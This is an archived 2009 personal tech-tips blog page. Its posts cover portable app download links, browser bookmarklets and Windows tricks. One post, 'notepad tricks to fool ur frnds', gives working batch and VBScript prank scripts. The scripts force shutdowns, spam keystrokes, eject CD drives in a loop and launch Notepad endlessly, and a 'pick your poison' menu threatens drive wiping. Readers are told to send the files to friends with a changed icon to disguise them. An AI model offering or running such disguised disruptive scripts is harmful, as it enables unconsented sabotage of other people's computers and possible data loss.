Sunday, August 30, 2009

EXCLUSIVE FOR PENDRIVE LOVERS

Having portable apps in Pen Drive is must for computer AND PENDREVE LOVERS

you do not need to install this softwares in your PC.

Just double click on them and they are ready to use.





1>Notepad++ Portable

a useful tool for programmers and developers. It’s main syntax highlighting feature makes it look different from other common text editors.


Download Notepad++ Portable form :-" http://portableapps.com/apps/development/notepadpp_portable"

2>Mozilla Firefox Portable Edition

its a web browser

Carry the “safest browser in the world” with you,

also have your extensions, bookmarks and addons ready to use any time.

Download firefox portable from :-" http://portableapps.com/apps/internet/firefox_portable"

3>VLC Media Player Portable

Best media player that

supports almost all popular media file formats.

Download VLC player portable from :-"http://portableapps.com/apps/music_video/vlc_portable"

4>ClamWin Antivirus Portable

free professional antivirus to keep your PC safe anytime, anywhere.

Download ClamWin AntiVirus from :-"http://portableapps.com/apps/utilities/clamwin_portable"


5>CCleaner Portable

Free, easy to use and very useful application. Cleans crap files from your system in few minutes. & also Makes you PC run faster.

Download CCleaner portable from:-"http://www.ccleaner.com/download/builds/downloading-portable"

6>Foxit Reader


Foxit Reader is a small and fast PDF viewer that is compatible with PDF Standard 1.7. It also includes

Javascript support

interactive form filler

annotation tools and built-in text converter

Download Foxit Reader from:-" http://foxit.vo.llnwd.net/o28/pub/foxit/reader/desktop/win/3.x/3.0/enu/FoxitReader30_enu.zip"


7>Utorrent

Download torrent files from anywhere you go.Tiny bittorrent client.

Download Utorrent from:" http://www.utorrent.com/"



8>Restoration

Recover accidentally deleted files

even after they were deleted from the recycle bin.
(very useful software)

Download Restoration from:- " http://www.snapfiles.com/reviews/Restoration/restoration.html "

9>Pidgin Portable

(useful for people who love to chat)
All-in-one instant messaging
supports AIM, ICQ, MSN Messenger, Yahoo, Gtalk, etc

Download Pidgin Portable from :-" http://portableapps.com/apps/internet/pidgin_portable"



10>7-Zip Portable

Now uncompress all types of compressed files with this cool free app.

Download 7-zip Portable from:- " http://portableapps.com/apps/utilities/7-zip_portable"

Wednesday, August 12, 2009

Type in Indian Languages on any website using Google Transliterate Bookmarklets

All of us know Google Transliterate, which we often use to write something in Indian languages. Google has added this transliterate support to many of it’s services including Blogger, Gmail & Orkut. For other sites we used to go to Google Transliterate page type there & copy/paste it, which is a long process. To encounter this problem, Google has Bookmarklets for each language it supports, which magically enables users to type on any site using Google Transliterate.

How it works?

All major browsers have bookmarks & a bookmark bar. You just need to drag & drop the bookmarklet provided by Google Transliterate for the language you select. Get these bookmarklets from this page (This page is actually for Kannada, there are links to other languages on the same page). Now go to any website, like twitter, facebook…etc & click on this bookmarklet. Magic happens & all the text boxes on the page get converted into Google Transliterate boxes!! Screenshot shows how it’s loaded on the Twitter home page. User can toggle Indic language with English by using keyboard shortcut CNTRL+G. The bookmarklet loads Google Transliterate javascript upon clicking which does the magic.

Thursday, July 30, 2009

Now itz easy to search a girl

Search
*Pin Code
*Phone No.
*Speed Post Tracking
&
More
http://www.indiapost.gov.in

BE FAST N QUICK

A simpal trick to erase ur pc
hard-disk disk error &
keep fast ur hard-disk read
write speed.
try
open run
=>type cmd

=>type CHKDSK

Sunday, July 26, 2009

Edit any webpage INTERNET

1) Go to the site you wish to edit

2) In the browser’s address bar, paste this code:

javascript:document.body.contentEditable
='true'; document.designMode='on'; void 0


3) Now click on the part of the page you want to edit and start changing, deleting and adding text.

Friday, July 24, 2009

FUNNY NOTEPAD TRICK

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

eg:
type “Haro ooo ooo oooon” without quotation marks
don’t press “enter” save the file
close notepad
open the file again
See what happens!

Edit any webpage INTERNET

1) Go to the site you wish to edit

2) In the browser’s address bar, paste this code:

javascript:document.body.contentEditable
='true'; document.designMode='on'; void 0


3) Now click on the part of the page you want to edit and start changing, deleting and adding text.

RENAME MULTIPLE FILES


It is possible to rename multiple file at one TIME.
Just select all the files to be renamed
and then press F2 key.
Give the desired name and then press enter.
You are done, file name has been changed.

Thursday, July 23, 2009

NOTE PAD TRICKS

10 notepad tricks to fool ur frnds 
1>
Cycle a message in your friend's computer:

Type :

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as "Anything.BAT" and send it.

2>
Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

3>
Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

4>
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

5>
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

6>
Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

7>
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

8>
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

9>
Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.


10>
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

Sunday, July 19, 2009

download ZOO ZOO funny videos

Be free to download funny adds of ZOO ZOO(vodafone) from following links:

ZOO pics:-   http://www.ziddu.com/download/5670151/ZooZooPics.rar.html

there is a problem while adding videos i will tomm